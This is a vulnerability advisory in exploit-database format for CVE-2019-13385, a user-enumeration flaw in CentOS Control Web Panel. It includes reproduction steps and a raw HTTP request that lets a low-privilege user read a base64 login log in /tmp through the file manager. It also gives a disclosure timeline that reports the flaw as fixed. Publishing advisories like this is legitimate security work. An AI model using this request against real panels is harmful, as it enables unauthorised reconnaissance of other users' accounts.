Share
# Exploit Title: CWP (CentOS Control Web Panel) User Enumeration  
# Date: 23 July 2019  
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak  
# Vendor Homepage: https://control-webpanel.com/  
# Version: 0.9.8.836 to 0.9.8.840  
# Tested on: CentOS 7.6.1810 (Core)  
# CVE : CVE-2019-13385  
  
+++++++++++++++++++++++++++++++++  
# Description:  
+++++++++++++++++++++++++++++++++  
  
An attacker who gains access as a low privilege user can check active users on the system by checking log file.  
The access log is stored at /tmp directory with encoded content in base64 format.  
  
+++++++++++++++++++++++++++++++++  
# Steps to Reproduce  
+++++++++++++++++++++++++++++++++  
  
1. Login as a low privilege user  
2. Browse to https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/username/fileManager2.php?frame=3&fm_current_dir=/tmp///   
3. login log is login.log file in base64 format  
  
Request:   
  
GET /cwp_70b80498fb4cb150/user1/fileManager2.php?frame=3&fm_current_dir=/tmp/// HTTP/1.1  
Host: 192.168.40.129:2083  
Connection: close  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Referer: https://192.168.40.129:2083/cwp_70b80498fb4cb150/user1/fileManager2.php?frame=2  
Accept-Encoding: gzip, deflate  
Accept-Language: en,th-TH;q=0.9,th;q=0.8  
  
+++++++++++++++++++++++++++++++++  
# PoC  
+++++++++++++++++++++++++++++++++  
  
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13385.md  
  
+++++++++++++++++++++++++++++++++  
# Timeline  
+++++++++++++++++++++++++++++++++  
2019-07-03: Discovered the bug  
2019-07-03: Reported to vendor  
2019-07-04: Vender accepted the vulnerability  
2019-07-11: The vulnerability has been fixed  
2019-07-23: Published  
  
  
+++++++++++++++++++++++++++++++++  
# Discovered by  
+++++++++++++++++++++++++++++++++  
Pongtorn Angsuchotmetee  
Nissana Sirijirakal  
Narin Boonwasanarak